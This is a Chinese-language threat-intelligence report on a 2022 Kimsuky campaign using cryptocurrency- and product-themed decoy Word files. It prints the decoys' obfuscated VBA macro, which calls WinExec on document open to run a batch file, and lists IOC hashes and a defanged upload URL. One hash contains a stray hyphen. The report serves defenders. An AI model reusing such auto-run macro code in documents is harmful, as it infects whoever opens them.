Kimsuky 针对加密货币公司与零售行业发起攻击
3 月 21 日,研究人员发现了 Kimsuky 组织的新攻击行动。Kimsuky 使用加密货币相关信息作为诱饵文件,看样子应该是针对加密货币公司发起的攻击。发现的恶意 Word 文件都是由名为 Acer 的作者创建的:
Regarding Quantity of Stakeholder.doc (修改者: Acer, 修改时间: 2022-03-21 10:29 AM)
Assets and Liabilities Status.doc (修改者: Acer, 修改时间: 2022-03-21 11:10 AM)
The 3rd Stakeholder Meeting.doc (修改者: Acer, 修改时间: 2022-03-21 11:03 AM)
诱饵文档
诱饵文档
诱饵文档
诱饵文档横向比较
所有的诱饵文件都使用相同的宏代码:
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
End Sub
看起来是由另一个 Wrod 文件来运行 no1.bat
,就像过去介绍的那样,由提示用户点击启用宏代码的恶意文档创建的。
恶意文档
研究人员也发现了伪装成产品介绍文件的恶意文档与上面的恶意文档采用相同的分发方式与执行流程,这意味着攻击者也针对零售分销行业发起攻击。
IOC
0ecc9a4cea5c289732c76234c47a60e9
82ed73e4adbe5c26bafb-5072657fd46b
7a2f350a2a6aa1d065c2b19be6dc6fb4
8a2eeafca1b33010d7ed812cf17d42f5
869f98aac4963c7db7276d2a914d081e
a872dbb06e2dc721f180d05e2c1c8c20
56a936b9b3a3bdafed40cf5d056febaf
dc0223fb97891a90049d0c0d2beeb756
http[://sysrtri-man.com/upl11/upload.php
参考来源
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录